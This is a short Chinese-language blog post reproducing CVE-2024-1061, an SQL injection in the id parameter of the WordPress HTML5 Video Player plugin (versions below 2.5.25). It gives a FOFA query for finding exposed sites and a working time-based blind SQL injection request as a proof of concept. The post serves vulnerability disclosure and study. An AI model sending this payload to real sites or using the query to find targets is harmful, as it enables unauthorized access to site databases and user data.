首页 前端知识 WordPress Plugin HTML5 Video Player SQL注入漏洞复现(CVE-2024-1061)

WordPress Plugin HTML5 Video Player SQL注入漏洞复现(CVE-2024-1061)

2024-02-26 20:02:01 前端知识 前端哥 114 271 我要收藏

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

0x02 漏洞概述

WordPress Plugin HTML5 Video Player 插件 get_view 函数中 id 参数存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 影响范围

HTML5 Video Player < 2.5.25

0x04 复现环境

FOFA:"wordpress" && body="html5-video-player"

0x05 漏洞复现

PoC

GET /?rest_route=/h5vp/v1/view/1&id=1' AND (SELECT 1 FROM (SELECT(SLEEP(10)))a)--  HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: clos
转载请注明出处或者链接地址:https://www.qianduange.cn//article/2740.html
评论
会员中心 联系我 留言建议 回顶部
复制成功!